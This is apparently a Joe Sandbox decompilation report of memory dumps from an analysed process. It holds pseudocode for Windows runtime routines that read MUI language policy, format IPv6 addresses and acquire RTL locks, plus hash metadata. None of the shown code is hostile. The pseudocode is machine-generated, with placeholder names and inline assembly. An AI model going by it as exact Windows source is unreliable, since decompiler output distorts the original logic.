                                                                             				// the Kernel-MUI-* names below are consistent with Software Licensing policy values.
                                                                             				if(E00BD8460(__ecx, L"WindowsExcludedProcs",  &_v44,  &_v24,  &_v8) >= 0) {
                                                                            					_v56 = 1;
                                                                            					if(_v8 != 0) {
                                                                             						// fs:[0x18] is the TEB, +0x30 the PEB, +0x18 PEB.ProcessHeap (x86); the call pattern
                                                                             						// heap, flags 0, pointer matches RtlFreeHeap, and E00BBE0C6(heap, 8, size) below matches
                                                                             						// RtlAllocateHeap with HEAP_ZERO_MEMORY.
                                                                             						_t207 = E00BBE025(__ecx,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 0, _v8);
                                                                            					}
                                                                            					_push(1);
                                                                            					_v8 = _t318;
                                                                            					E00BD718A(_t207);
                                                                            					_t335 = _t335 + 4;
                                                                            				}
                                                                            				_v60 = _v60 | 0xffffffff;
                                                                            				if(E00BD8460(_t322, L"Kernel-MUI-Number-Allowed",  &_v44,  &_v24,  &_v8) >= 0) {
                                                                            					_t333 =  *_v8;
                                                                            					_v60 = _t333;
                                                                            					_t314 = E00BBE025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
                                                                            					_push(_t333);
                                                                            					_v8 = _t318;
                                                                            					E00BD718A(_t314);
                                                                            					_t335 = _t335 + 4;
                                                                            				}
                                                                            				_t216 = E00BD8460(_t322, L"Kernel-MUI-Language-Allowed",  &_v44,  &_v24,  &_v8);
                                                                            				_t332 = ";";
                                                                            				if(_t216 < 0) {
                                                                            					L17:
                                                                            					if(E00BD8460(_t322, L"Kernel-MUI-Language-Disallowed",  &_v44,  &_v24,  &_v8) < 0) {
                                                                            						L30:
                                                                            						if(E00BD8460(_t322, L"Kernel-MUI-Language-SKU",  &_v44,  &_v24,  &_v8) < 0) {
                                                                            							L46:
                                                                            							_t329 = 0;
                                                                            							L47:
                                                                            							if(_v8 != _t318) {
                                                                            								E00BBE025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
                                                                            							}
                                                                            							if(_v28 != _t318) {
                                                                            								if(_v20 != _t318) {
                                                                            									E00BBE025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v20);
                                                                            									_v20 = _t318;
                                                                            									_v40 = _t318;
                                                                            								}
                                                                            							}
                                                                            							goto L49;
                                                                            						}
                                                                            						_t231 = _v24;
                                                                            						_t322 = _t231 + 4;
                                                                            						_push(_t231);
                                                                            						_v52 = _t322;
                                                                            						E00BD718A(_t231);
                                                                            						if(_t322 == _t318) {
                                                                            							_v32 = _t318;
                                                                            						} else {
                                                                            							_v32 = E00BBE0C6( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 8, _t322);
                                                                            						}
                                                                            						if(_v32 == _t318) {
                                                                            							_v52 = _t318;
                                                                            							L58:
                                                                             							_t329 = 0xc0000017; // STATUS_NO_MEMORY: heap allocation for the language list failed
                                                                            							goto L47;
                                                                            						} else {
                                                                            							E00BB2340(_v32, _v8, _v24);
                                                                            							_v16 = _v32;
                                                                            							_a4 = _t318;
                                                                            							_t235 = E00BCE679(_v32, _t332);
                                                                            							while(1) {
                                                                            								_t319 = _t235;
                                                                            								if(_t319 == 0) {
                                                                            									break;
                                                                            								}
                                                                            								 *_t319 = 0;
                                                                            								_t321 = _t319 + 2;
                                                                            								E00BBE2A8(_t322,  &_v68, _v16);
                                                                            								if(E00BD5553(_t328,  &_v68,  &_v36) != 0) {
                                                                            									_a4 = _a4 + 1;
                                                                            								}
                                                                            								_v16 = _t321;
                                                                            								_t235 = E00BCE679(_t321, _t332);
                                                                            								_pop(_t322);
                                                                            							}
                                                                            							_t236 = _v16;
                                                                            							if( *_v16 != _t319) {
                                                                            								E00BBE2A8(_t322,  &_v68, _t236);
                                                                            								if(E00BD5553(_t328,  &_v68,  &_v36) != 0) {
                                                                            									_a4 = _a4 + 1;
                                                                            								}
                                                                            							}
                                                                            							if(_a4 == 0) {
                                                                            								E00BBE025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 0, _v32);
                                                                            								_v52 = _v52 & 0x00000000;
                                                                            								_v32 = _v32 & 0x00000000;
                                                                            							}
                                                                            							if(_v8 != 0) {
                                                                            								E00BBE025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 0, _v8);
                                                                            							}
                                                                            							_v8 = _v8 & 0x00000000;
                                                                            							_t318 = 0;
                                                                            							goto L46;
                                                                            						}
                                                                            					}
                                                                            					_t257 = _v24;
                                                                            					_t322 = _t257 + 4;
                                                                            					_push(_t257);
                                                                            					_v40 = _t322;
                                                                            					E00BD718A(_t257);
                                                                            					_t338 = _t335 + 4;
                                                                            					if(_t322 == _t318) {
                                                                            						_v20 = _t318;
                                                                            					} else {
                                                                            						_v20 = E00BBE0C6( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 8, _t322);
                                                                            					}
                                                                            					if(_v20 == _t318) {
                                                                            						_v40 = _t318;
                                                                            						goto L58;
                                                                            					} else {
                                                                            						E00BB2340(_v20, _v8, _v24);
                                                                            						_v16 = _v20;
                                                                            						_a4 = _t318;
                                                                            						_t261 = E00BCE679(_v20, _t332);
                                                                            						_t335 = _t338 + 0x14;
                                                                            						while(1) {
                                                                            							_v12 = _t261;
                                                                            							if(_t261 == _t318) {
                                                                            								break;
                                                                            							}
                                                                            							_v12 = _v12 + 2;
                                                                            							 *_v12 = 0;
                                                                            							E00BBE2A8(_v12,  &_v68, _v16);
                                                                            							if(E00BD5553(_t328,  &_v68,  &_v36) != 0) {
                                                                            								_a4 = _a4 + 1;
                                                                            							}
                                                                            							_v16 = _v12;
                                                                            							_t261 = E00BCE679(_v12, _t332);
                                                                            							_pop(_t322);
                                                                            						}
                                                                            						_t269 = _v16;
                                                                            						if( *_v16 != _t318) {
                                                                            							E00BBE2A8(_t322,  &_v68, _t269);
                                                                            							if(E00BD5553(_t328,  &_v68,  &_v36) != 0) {
                                                                            								_a4 = _a4 + 1;
                                                                            							}
                                                                            						}
                                                                            						if(_a4 == _t318) {
                                                                            							E00BBE025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v20);
                                                                            							_v40 = _t318;
                                                                            							_v20 = _t318;
                                                                            						}
                                                                            						if(_v8 != _t318) {
                                                                            							E00BBE025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
                                                                            						}
                                                                            						_v8 = _t318;
                                                                            						goto L30;
                                                                            					}
                                                                            				}
                                                                            				_t284 = _v24;
                                                                            				_t322 = _t284 + 4;
                                                                            				_push(_t284);
                                                                            				_v48 = _t322;
                                                                            				E00BD718A(_t284);
                                                                            				_t339 = _t335 + 4;
                                                                            				if(_t322 == _t318) {
                                                                            					_v28 = _t318;
                                                                            				} else {
                                                                            					_v28 = E00BBE0C6( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 8, _t322);
                                                                            				}
                                                                            				if(_v28 == _t318) {
                                                                            					_v48 = _t318;
                                                                            					goto L58;
                                                                            				} else {
                                                                            					E00BB2340(_v28, _v8, _v24);
                                                                            					_v16 = _v28;
                                                                            					_a4 = _t318;
                                                                            					_t288 = E00BCE679(_v28, _t332);
                                                                            					_t335 = _t339 + 0x14;
                                                                            					while(1) {
                                                                            						_v12 = _t288;
                                                                            						if(_t288 == _t318) {
                                                                            							break;
                                                                            						}
                                                                            						_v12 = _v12 + 2;
                                                                            						 *_v12 = 0;
                                                                            						E00BBE2A8(_v12,  &_v68, _v16);
                                                                            						if(E00BD5553(_t328,  &_v68,  &_v36) != 0) {
                                                                            							_a4 = _a4 + 1;
                                                                            						}
                                                                            						_v16 = _v12;
                                                                            						_t288 = E00BCE679(_v12, _t332);
                                                                            						_pop(_t322);
                                                                            					}
                                                                            					_t296 = _v16;
                                                                            					if( *_v16 != _t318) {
                                                                            						E00BBE2A8(_t322,  &_v68, _t296);
                                                                            						if(E00BD5553(_t328,  &_v68,  &_v36) != 0) {
                                                                            							_a4 = _a4 + 1;
                                                                            						}
                                                                            					}
                                                                            					if(_a4 == _t318) {
                                                                            						E00BBE025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v28);
                                                                            						_v48 = _t318;
                                                                            						_v28 = _t318;
                                                                            					}
                                                                            					if(_v8 != _t318) {
                                                                            						E00BBE025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
                                                                            					}
                                                                            					_v8 = _t318;
                                                                            					goto L17;
                                                                            				}
                                                                            			}

                                                                            APIs
                                                                            Strings
                                                                            • Kernel-MUI-Language-Disallowed, xrefs: 00BD8914
                                                                            • Kernel-MUI-Number-Allowed, xrefs: 00BD87E6
                                                                            • WindowsExcludedProcs, xrefs: 00BD87C1
                                                                            • Kernel-MUI-Language-SKU, xrefs: 00BD89FC
                                                                            • Kernel-MUI-Language-Allowed, xrefs: 00BD8827
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.460328831.0000000000BA0000.00000040.00000001.sdmp, Offset: 00B90000, based on PE: true
• Associated: 00000005.00000002.460311683.0000000000B90000.00000040.00000001.sdmp
• Associated: 00000005.00000002.460461002.0000000000C80000.00000040.00000001.sdmp
• Associated: 00000005.00000002.460493201.0000000000C90000.00000040.00000001.sdmp
• Associated: 00000005.00000002.460525117.0000000000C94000.00000040.00000001.sdmp
• Associated: 00000005.00000002.460563735.0000000000C97000.00000040.00000001.sdmp
• Associated: 00000005.00000002.460596140.0000000000CA0000.00000040.00000001.sdmp
• Associated: 00000005.00000002.460679568.0000000000D00000.00000040.00000001.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_b90000_medicomsh78694.jbxd
                                                                            Similarity
                                                                            • API ID: _wcspbrk
                                                                            • String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
                                                                            • API String ID: 402402107-258546922
                                                                            • Opcode ID: 4300c858a9f51a8277f3febb57c6d888ebddad4f41995e90f235c6c0a1e48cf7
                                                                            • Instruction ID: 1262d65c6b004d39c0fce84308c9590d457a734e618bda86d67ae7cafa98e890
                                                                            • Opcode Fuzzy Hash: 4300c858a9f51a8277f3febb57c6d888ebddad4f41995e90f235c6c0a1e48cf7
                                                                            • Instruction Fuzzy Hash: F4F1D4B2D00209EFCF11EF95C9819EEBBF8FF08301F1444AAE515A7621EB759A45DB60
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 38%
                                                                            			E00BF13CB(intOrPtr* _a4, intOrPtr _a8) {
                                                                            				char _v8;
                                                                            				intOrPtr _v12;
                                                                            				intOrPtr* _v16;
                                                                            				intOrPtr _v20;
                                                                            				char _v24;
                                                                            				intOrPtr _t71;
                                                                            				signed int _t78;
                                                                            				signed int _t86;
                                                                            				char _t90;
                                                                            				signed int _t91;
                                                                            				signed int _t96;
                                                                            				intOrPtr _t108;
                                                                            				signed int _t114;
                                                                            				void* _t115;
                                                                            				intOrPtr _t128;
                                                                            				intOrPtr* _t129;
                                                                            				void* _t130;
                                                                            
                                                                            				_t129 = _a4;
                                                                            				_t128 = _a8;
                                                                            				_t116 = 0;
                                                                            				_t71 = _t128 + 0x5c;
                                                                            				_v8 = 8;
                                                                            				_v20 = _t71;
                                                                            				if( *_t129 == 0) {
                                                                            					if( *((intOrPtr*)(_t129 + 2)) != 0 ||  *((intOrPtr*)(_t129 + 4)) != 0 ||  *((intOrPtr*)(_t129 + 6)) != 0 ||  *(_t129 + 0xc) == 0) {
                                                                            						goto L5;
                                                                            					} else {
                                                                            						_t96 =  *(_t129 + 8) & 0x0000ffff;
                                                                            						if(_t96 != 0) {
                                                                            							L38:
                                                                            							if(_t96 != 0xffff ||  *(_t129 + 0xa) != _t116) {
                                                                            								goto L5;
                                                                            							} else {
                                                                            								_push( *(_t129 + 0xf) & 0x000000ff);
                                                                            								_push( *(_t129 + 0xe) & 0x000000ff);
                                                                            								_push( *(_t129 + 0xd) & 0x000000ff);
                                                                            								_t86 = E00BE7707(_t128, _t71 - _t128 >> 1, L"::ffff:0:%u.%u.%u.%u",  *(_t129 + 0xc) & 0x000000ff);
                                                                            								L36:
                                                                            								return _t128 + _t86 * 2;
                                                                            							}
                                                                            						}
                                                                            						_t114 =  *(_t129 + 0xa) & 0x0000ffff;
                                                                            						if(_t114 == 0) {
                                                                            							L33:
                                                                            							_t115 = 0xbb2926;
                                                                            							L35:
                                                                            							_push( *(_t129 + 0xf) & 0x000000ff);
                                                                            							_push( *(_t129 + 0xe) & 0x000000ff);
                                                                            							_push( *(_t129 + 0xd) & 0x000000ff);
                                                                            							_push( *(_t129 + 0xc) & 0x000000ff);
                                                                            							_t86 = E00BE7707(_t128, _t71 - _t128 >> 1, L"::%hs%u.%u.%u.%u", _t115);
                                                                            							goto L36;
                                                                            						}
                                                                            						if(_t114 != 0xffff) {
                                                                            							_t116 = 0;
                                                                            							goto L38;
                                                                            						}
                                                                            						if(_t114 != 0) {
                                                                            							_t115 = 0xbb9cac;
                                                                            							goto L35;
                                                                            						}
                                                                            						goto L33;
                                                                            					}
                                                                            				} else {
                                                                            					L5:
                                                                            					_a8 = _t116;
                                                                            					_a4 = _t116;
                                                                            					_v12 = _t116;
                                                                            					if(( *(_t129 + 8) & 0x0000fffd) == 0) {
                                                                            						if( *(_t129 + 0xa) == 0xfe5e) {
                                                                            							_v8 = 6;
                                                                            						}
                                                                            					}
                                                                            					_t90 = _v8;
                                                                            					if(_t90 <= _t116) {
                                                                            						L11:
                                                                            						if(_a8 - _a4 <= 1) {
                                                                            							_a8 = _t116;
                                                                            							_a4 = _t116;
                                                                            						}
                                                                            						_t91 = 0;
                                                                            						if(_v8 <= _t116) {
                                                                            							L22:
                                                                            							if(_v8 < 8) {
                                                                            								_push( *(_t129 + 0xf) & 0x000000ff);
                                                                            								_push( *(_t129 + 0xe) & 0x000000ff);
                                                                            								_push( *(_t129 + 0xd) & 0x000000ff);
                                                                            								_t128 = _t128 + E00BE7707(_t128, _t71 - _t128 >> 1, L":%u.%u.%u.%u",  *(_t129 + 0xc) & 0x000000ff) * 2;
                                                                            							}
                                                                            							return _t128;
                                                                            						} else {
                                                                            							L14:
                                                                            							if(_a4 > _t91 || _t91 >= _a8) {
                                                                            								if(_t91 != _t116 && _t91 != _a8) {
                                                                            									_push(":");
                                                                            									_push(_t71 - _t128 >> 1);
                                                                            									_push(_t128);
                                                                            									_t128 = _t128 + E00BE7707() * 2;
                                                                            									_t71 = _v20;
                                                                            									_t130 = _t130 + 0xc;
                                                                            								}
                                                                            								_t78 = E00BE7707(_t128, _t71 - _t128 >> 1, L"%x",  *(_t129 + _t91 * 2) & 0x0000ffff);
                                                                            								_t130 = _t130 + 0x10;
                                                                            							} else {
                                                                            								_push(L"::");
                                                                            								_push(_t71 - _t128 >> 1);
                                                                            								_push(_t128);
                                                                            								_t78 = E00BE7707();
                                                                            								_t130 = _t130 + 0xc;
                                                                            								_t91 = _a8 - 1;
                                                                            							}
                                                                            							_t91 = _t91 + 1;
                                                                            							_t128 = _t128 + _t78 * 2;
                                                                            							_t71 = _v20;
                                                                            							if(_t91 >= _v8) {
                                                                            								goto L22;
                                                                            							}
                                                                            							_t116 = 0;
                                                                            							goto L14;
                                                                            						}
                                                                            					} else {
                                                                            						_t108 = 1;
                                                                            						_v16 = _t129;
                                                                            						_v24 = _t90;
                                                                            						do {
                                                                            							if( *_v16 == _t116) {
                                                                            								if(_t108 - _v12 > _a8 - _a4) {
                                                                            									_a4 = _v12;
                                                                            									_a8 = _t108;
                                                                            								}
                                                                            								_t116 = 0;
                                                                            							} else {
                                                                            								_v12 = _t108;
                                                                            							}
                                                                            							_v16 = _v16 + 2;
                                                                            							_t108 = _t108 + 1;
                                                                            							_t26 =  &_v24;
                                                                            							 *_t26 = _v24 - 1;
                                                                            						} while ( *_t26 != 0);
                                                                            						goto L11;
                                                                            					}
                                                                            				}
                                                                            			}

                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.460328831.0000000000BA0000.00000040.00000001.sdmp, Offset: 00B90000, based on PE: true
                                                                            • Associated: 00000005.00000002.460311683.0000000000B90000.00000040.00000001.sdmp
                                                                            • Associated: 00000005.00000002.460461002.0000000000C80000.00000040.00000001.sdmp
                                                                            • Associated: 00000005.00000002.460493201.0000000000C90000.00000040.00000001.sdmp
                                                                            • Associated: 00000005.00000002.460525117.0000000000C94000.00000040.00000001.sdmp
                                                                            • Associated: 00000005.00000002.460563735.0000000000C97000.00000040.00000001.sdmp
                                                                            • Associated: 00000005.00000002.460596140.0000000000CA0000.00000040.00000001.sdmp
                                                                            • Associated: 00000005.00000002.460679568.0000000000D00000.00000040.00000001.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_b90000_medicomsh78694.jbxd
                                                                            Similarity
                                                                            • API ID: ___swprintf_l
                                                                            • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                            • API String ID: 48624451-2108815105
                                                                            • Opcode ID: be0f946cf7648386d484482a9e3dfca6a7817196b2cc7b55f698c7b12ade4225
                                                                            • Instruction ID: 30bfa8f5ea3bebc8c0f6838bbbc599f036876f69702964f86e9c4e090f80788d
                                                                            • Opcode Fuzzy Hash: be0f946cf7648386d484482a9e3dfca6a7817196b2cc7b55f698c7b12ade4225
                                                                            • Instruction Fuzzy Hash: 6C612671900659EACB24CF5EC8908FEBBF5EFD5300B14C8ADEA9687640D774AA44DB60
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 50%
                                                                            			E00BF0554(signed int _a4, char _a8) {
                                                                            				void* __ebx;
                                                                            				void* __edi;
                                                                            				void* __esi;
                                                                            				signed int* _t49;
                                                                            				signed int _t51;
                                                                            				signed int _t56;
                                                                            				signed int _t58;
                                                                            				signed int _t61;
                                                                            				signed int _t63;
                                                                            				void* _t66;
                                                                            				intOrPtr _t67;
                                                                            				void* _t69;
                                                                            				signed int _t70;
                                                                            				void* _t75;
                                                                            				signed int _t81;
                                                                            				signed int _t84;
                                                                            				void* _t86;
                                                                            				signed int _t93;
                                                                            				signed int _t96;
                                                                            				intOrPtr _t105;
                                                                            				signed int _t107;
                                                                            				void* _t110;
                                                                            				signed int _t115;
                                                                            				signed int* _t119;
                                                                            				void* _t125;
                                                                            				void* _t126;
                                                                            				signed int _t128;
                                                                            				signed int _t130;
                                                                            				signed int _t138;
                                                                            				signed int _t144;
                                                                            				void* _t158;
                                                                            				void* _t159;
                                                                            				void* _t160;
                                                                            
                                                                            				_t96 = _a4;
                                                                            				_t115 =  *(_t96 + 0x28);
                                                                            				_push(_t138);
                                                                            				if(_t115 < 0) {
                                                                            					_t105 =  *[fs:0x18];
                                                                            					__eflags =  *((intOrPtr*)(_t96 + 0x2c)) -  *((intOrPtr*)(_t105 + 0x24));
                                                                            					if( *((intOrPtr*)(_t96 + 0x2c)) !=  *((intOrPtr*)(_t105 + 0x24))) {
                                                                            						goto L6;
                                                                            					} else {
                                                                            						__eflags = _t115 | 0xffffffff;
                                                                            						asm("lock xadd [eax], edx");
                                                                            						return 1;
                                                                            					}
                                                                            				} else {
                                                                            					L6:
                                                                            					_push(_t128);
                                                                            					while(1) {
                                                                            						L7:
                                                                            						__eflags = _t115;
                                                                            						if(_t115 >= 0) {
                                                                            							break;
                                                                            						}
                                                                            						__eflags = _a8;
                                                                            						if(_a8 == 0) {
                                                                            							__eflags = 0;
                                                                            							return 0;
                                                                            						} else {
                                                                            							 *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) =  *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) + 1;
                                                                            							_t49 = _t96 + 0x1c;
                                                                            							_t106 = 1;
                                                                            							asm("lock xadd [edx], ecx");
                                                                            							_t115 =  *(_t96 + 0x28);
                                                                            							__eflags = _t115;
                                                                            							if(_t115 < 0) {
                                                                            								L23:
                                                                            								_t130 = 0;
                                                                            								__eflags = 0;
                                                                            								while(1) {
                                                                            									_t118 =  *(_t96 + 0x30) & 0x00000001;
                                                                            									asm("sbb esi, esi");
                                                                            									_t144 =  !( ~( *(_t96 + 0x30) & 1)) & 0x00c901c0;
                                                                            									_push(_t144);
                                                                            									_push(0);
                                                                            									_t51 = L00BAF8CC( *((intOrPtr*)(_t96 + 0x18)));
                                                                            									__eflags = _t51 - 0x102;
                                                                            									if(_t51 != 0x102) {
                                                                            										break;
                                                                            									}
                                                                            									_t106 =  *(_t144 + 4);
                                                                            									_t126 =  *_t144;
                                                                            									_t86 = L00BF4FC0(_t126,  *(_t144 + 4), 0xff676980, 0xffffffff);
                                                                            									_push(_t126);
                                                                            									_push(_t86);
                                                                            									L00C03F92(0x65, 0, "RTL: Acquire Shared Sem Timeout %d(%I64u secs)\n", _t130);
                                                                            									L00C03F92(0x65, 0, "RTL: Resource at %p\n", _t96);
                                                                            									_t130 = _t130 + 1;
                                                                            									_t160 = _t158 + 0x28;
                                                                            									__eflags = _t130 - 2;
                                                                            									if(__eflags > 0) {
                                                                            										E00C3217A(_t106, __eflags, _t96);
                                                                            									}
                                                                            									_push("RTL: Re-Waiting\n");
                                                                            									_push(0);
                                                                            									_push(0x65);
                                                                            									L00C03F92();
                                                                            									_t158 = _t160 + 0xc;
                                                                            								}
                                                                            								__eflags = _t51;
                                                                            								if(__eflags < 0) {
                                                                            									_push(_t51);
                                                                            									L00BF3915(_t96, _t106, _t118, _t130, _t144, __eflags);
                                                                            									asm("int3");
                                                                            									while(1) {
                                                                            										L32:
                                                                            										__eflags = _a8;
                                                                            										if(_a8 == 0) {
                                                                            											break;
                                                                            										}
                                                                            										 *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) =  *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) + 1;
                                                                            										_t119 = _t96 + 0x24;
                                                                            										_t107 = 1;
                                                                            										asm("lock xadd [eax], ecx");
                                                                            										_t56 =  *(_t96 + 0x28);
                                                                            										_a4 = _t56;
                                                                            										__eflags = _t56;
                                                                            										if(_t56 != 0) {
                                                                            											L40:
                                                                            											_t128 = 0;
                                                                            											__eflags = 0;
                                                                            											while(1) {
                                                                            												_t121 =  *(_t96 + 0x30) & 0x00000001;
                                                                            												asm("sbb esi, esi");
                                                                            												_t138 =  !( ~( *(_t96 + 0x30) & 1)) & 0x00c901c0;
                                                                            												_push(_t138);
                                                                            												_push(0);
                                                                            												_t58 = L00BAF8CC( *((intOrPtr*)(_t96 + 0x20)));
                                                                            												__eflags = _t58 - 0x102;
                                                                            												if(_t58 != 0x102) {
                                                                            													break;
                                                                            												}
                                                                            												_t107 =  *(_t138 + 4);
                                                                            												_t125 =  *_t138;
                                                                            												_t75 = L00BF4FC0(_t125, _t107, 0xff676980, 0xffffffff);
                                                                            												_push(_t125);
                                                                            												_push(_t75);
                                                                            												L00C03F92(0x65, 0, "RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)\n", _t128);
                                                                            												L00C03F92(0x65, 0, "RTL: Resource at %p\n", _t96);
                                                                            												_t128 = _t128 + 1;
                                                                            												_t159 = _t158 + 0x28;
                                                                            												__eflags = _t128 - 2;
                                                                            												if(__eflags > 0) {
                                                                            													E00C3217A(_t107, __eflags, _t96);
                                                                            												}
                                                                            												_push("RTL: Re-Waiting\n");
                                                                            												_push(0);
                                                                            												_push(0x65);
                                                                            												L00C03F92();
                                                                            												_t158 = _t159 + 0xc;
                                                                            											}
                                                                            											__eflags = _t58;
                                                                            											if(__eflags < 0) {
                                                                            												_push(_t58);
                                                                            												L00BF3915(_t96, _t107, _t121, _t128, _t138, __eflags);
                                                                            												asm("int3");
                                                                            												_t61 =  *_t107;
                                                                            												 *_t107 = 0;
                                                                            												__eflags = _t61;
                                                                            												if(_t61 == 0) {
                                                                            													L1:
                                                                            													_t63 = E00BD5384(_t138 + 0x24);
                                                                            													if(_t63 != 0) {
                                                                            														goto L52;
                                                                            													} else {
                                                                            														goto L2;
                                                                            													}
                                                                            												} else {
                                                                            													_t123 =  *((intOrPtr*)(_t138 + 0x18));
                                                                            													_push( &_a4);
                                                                            													_push(_t61);
                                                                            													_t70 = L00BAF970( *((intOrPtr*)(_t138 + 0x18)));
                                                                            													__eflags = _t70;
                                                                            													if(__eflags >= 0) {
                                                                            														goto L1;
                                                                            													} else {
                                                                            														_push(_t70);
                                                                            														L00BF3915(_t96,  &_a4, _t123, _t128, _t138, __eflags);
                                                                            														L52:
                                                                            														_t122 =  *((intOrPtr*)(_t138 + 0x20));
                                                                            														_push( &_a4);
                                                                            														_push(1);
                                                                            														_t63 = L00BAF970( *((intOrPtr*)(_t138 + 0x20)));
                                                                            														__eflags = _t63;
                                                                            														if(__eflags >= 0) {
                                                                            															L2:
                                                                            															return _t63;
                                                                            														} else {
                                                                            															_push(_t63);
                                                                            															L00BF3915(_t96,  &_a4, _t122, _t128, _t138, __eflags);
                                                                            															_t109 =  *((intOrPtr*)(_t138 + 0x20));
                                                                            															_push( &_a4);
                                                                            															_push(1);
                                                                            															_t63 = L00BAF970( *((intOrPtr*)(_t138 + 0x20)));
                                                                            															__eflags = _t63;
                                                                            															if(__eflags >= 0) {
                                                                            																goto L2;
                                                                            															} else {
                                                                            																_push(_t63);
                                                                            																_t66 = L00BF3915(_t96, _t109, _t122, _t128, _t138, __eflags);
                                                                            																asm("int3");
                                                                            																while(1) {
                                                                            																	_t110 = _t66;
                                                                            																	__eflags = _t66 - 1;
                                                                            																	if(_t66 != 1) {
                                                                            																		break;
                                                                            																	}
                                                                            																	_t128 = _t128 | 0xffffffff;
                                                                            																	_t66 = _t110;
                                                                            																	asm("lock cmpxchg [ebx], edi");
                                                                            																	__eflags = _t66 - _t110;
                                                                            																	if(_t66 != _t110) {
                                                                            																		continue;
                                                                            																	} else {
                                                                            																		_t67 =  *[fs:0x18];
                                                                            																		 *((intOrPtr*)(_t138 + 0x2c)) =  *((intOrPtr*)(_t67 + 0x24));
                                                                            																		return _t67;
                                                                            																	}
                                                                            																	goto L59;
                                                                            																}
                                                                            																E00BD5329(_t110, _t138);
                                                                            																_t69 = E00BD53A5(_t138, 1);
                                                                            																return _t69;
                                                                            															}
                                                                            														}
                                                                            													}
                                                                            												}
                                                                            											} else {
                                                                            												_t56 =  *(_t96 + 0x28);
                                                                            												goto L3;
                                                                            											}
                                                                            										} else {
                                                                            											_t107 =  *_t119;
                                                                            											__eflags = _t107;
                                                                            											if(__eflags > 0) {
                                                                            												while(1) {
                                                                            													_t81 = _t107;
                                                                            													asm("lock cmpxchg [edi], esi");
                                                                            													__eflags = _t81 - _t107;
                                                                            													if(_t81 == _t107) {
                                                                            														break;
                                                                            													}
                                                                            													_t107 = _t81;
                                                                            													__eflags = _t81;
                                                                            													if(_t81 > 0) {
                                                                            														continue;
                                                                            													}
                                                                            													break;
                                                                            												}
                                                                            												_t56 = _a4;
                                                                            												__eflags = _t107;
                                                                            											}
                                                                            											if(__eflags != 0) {
                                                                            												while(1) {
                                                                            													L3:
                                                                            													__eflags = _t56;
                                                                            													if(_t56 != 0) {
                                                                            														goto L32;
                                                                            													}
                                                                            													_t107 = _t107 | 0xffffffff;
                                                                            													_t56 = 0;
                                                                            													asm("lock cmpxchg [edx], ecx");
                                                                            													__eflags = 0;
                                                                            													if(0 != 0) {
                                                                            														continue;
                                                                            													} else {
                                                                            														 *((intOrPtr*)(_t96 + 0x2c)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
                                                                            														return 1;
                                                                            													}
                                                                            													goto L59;
                                                                            												}
                                                                            												continue;
                                                                            											} else {
                                                                            												goto L40;
                                                                            											}
                                                                            										}
                                                                            										goto L59;
                                                                            									}
                                                                            									__eflags = 0;
                                                                            									return 0;
                                                                            								} else {
                                                                            									_t115 =  *(_t96 + 0x28);
                                                                            									continue;
                                                                            								}
                                                                            							} else {
                                                                            								_t106 =  *_t49;
                                                                            								__eflags = _t106;
                                                                            								if(__eflags > 0) {
                                                                            									while(1) {
                                                                            										_t93 = _t106;
                                                                            										asm("lock cmpxchg [edi], esi");
                                                                            										__eflags = _t93 - _t106;
                                                                            										if(_t93 == _t106) {
                                                                            											break;
                                                                            										}
                                                                            										_t106 = _t93;
                                                                            										__eflags = _t93;
                                                                            										if(_t93 > 0) {
                                                                            											continue;
                                                                            										}
                                                                            										break;
                                                                            									}
                                                                            									__eflags = _t106;
                                                                            								}
                                                                            								if(__eflags != 0) {
                                                                            									continue;
                                                                            								} else {
                                                                            									goto L23;
                                                                            								}
                                                                            							}
                                                                            						}
                                                                            						goto L59;
                                                                            					}
                                                                            					_t84 = _t115;
                                                                            					asm("lock cmpxchg [esi], ecx");
                                                                            					__eflags = _t84 - _t115;
                                                                            					if(_t84 != _t115) {
                                                                            						_t115 = _t84;
                                                                            						goto L7;
                                                                            					} else {
                                                                            						return 1;
                                                                            					}
                                                                            				}
                                                                            				L59:
                                                                            			}

                                                                            0x00c122e4
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00c122e6
                                                                            0x00c122e9
                                                                            0x00c122f4
                                                                            0x00c122f9
                                                                            0x00c122fa
